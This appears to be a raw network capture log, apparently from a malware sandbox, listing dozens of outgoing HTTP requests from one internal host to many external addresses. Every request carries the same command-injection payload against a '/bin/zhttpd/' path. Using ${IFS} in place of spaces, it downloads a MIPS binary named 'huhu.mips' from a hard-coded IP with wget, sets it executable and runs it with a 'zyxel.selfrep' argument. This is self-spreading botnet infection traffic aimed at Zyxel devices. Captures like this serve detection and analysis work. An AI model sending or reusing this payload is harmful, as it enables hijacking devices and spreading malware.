                                            Feb 2, 2024 06:21:04.476427078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2293192.168.2.155935466.12.158.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476445913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2294192.168.2.155833083.176.136.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476470947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2295192.168.2.1535782128.148.206.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476505995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2296192.168.2.1553622155.49.2.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476558924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2297192.168.2.1533396170.194.15.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476600885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2298192.168.2.1535508125.46.202.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476629019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2299192.168.2.1551682208.194.15.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476670980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2300192.168.2.154708660.152.86.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476703882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2301192.168.2.1537896151.203.96.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476738930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2302192.168.2.153706474.46.78.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476766109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2303192.168.2.1558484112.165.249.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476797104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2304192.168.2.1551050102.197.190.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476864100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2305192.168.2.155870612.44.51.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476902962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2306192.168.2.1548360177.128.107.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476938009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2307192.168.2.1544460186.159.82.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.476984024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2308192.168.2.154360051.54.127.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477013111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2309192.168.2.1556312198.194.189.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477030993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2310192.168.2.1549116196.60.148.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477082014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2311192.168.2.1556916142.147.69.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477138042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2312192.168.2.1539118144.106.162.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477184057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2313192.168.2.1533354121.207.89.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477206945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2314192.168.2.1554254185.57.236.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477252960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2315192.168.2.153311461.222.146.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477283001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2316192.168.2.1555386141.114.207.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477324963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2317192.168.2.155817852.69.200.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477364063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2318192.168.2.1555250162.133.76.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477411985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2319192.168.2.1540670166.33.228.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477436066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2320192.168.2.155214482.130.205.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477461100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2321192.168.2.153925674.17.122.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477509022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2322192.168.2.154577284.231.186.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477571964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2323192.168.2.153625079.186.71.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477626085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2324192.168.2.153613694.198.5.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477660894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2325192.168.2.155816266.100.235.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477689028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2326192.168.2.1551920192.208.61.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477720022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2327192.168.2.1560616121.250.49.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477746010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2328192.168.2.154067879.65.127.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477804899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2329192.168.2.155690017.114.182.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477838993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2330192.168.2.1555018168.245.228.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477895021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2331192.168.2.1553546123.114.214.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477910042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2332192.168.2.153362270.172.188.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477957964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2333192.168.2.155154647.79.148.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.477962971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2334192.168.2.1544438184.31.3.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478009939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2335192.168.2.1549922213.133.164.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478044033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2336192.168.2.154077839.44.90.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478101015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2337192.168.2.1550656155.176.101.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478116989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2338192.168.2.1532898198.2.14.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478166103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2339192.168.2.1551874128.78.136.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478200912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2340192.168.2.1558656195.146.253.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478240967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2341192.168.2.1557226187.187.88.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478260040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2342192.168.2.156033045.115.219.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478306055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2343192.168.2.153305453.177.219.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478384972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2344192.168.2.15447045.39.37.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478406906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2345192.168.2.154441881.75.4.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478447914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2346192.168.2.1534590169.148.248.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478480101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2347192.168.2.154407097.133.168.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478532076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2348192.168.2.1538112156.245.110.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478554010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2349192.168.2.153954037.93.117.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478600025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2350192.168.2.153656634.177.211.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478634119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2351192.168.2.1545402133.180.73.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478672028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2352192.168.2.1549006181.163.46.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478708982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2353192.168.2.1534240169.134.171.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478739977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2354192.168.2.1558524180.42.212.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478796005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2355192.168.2.1559772130.49.254.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478833914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2356192.168.2.1558042182.206.104.154443
                                            TimestampBytes transferredDirectionData
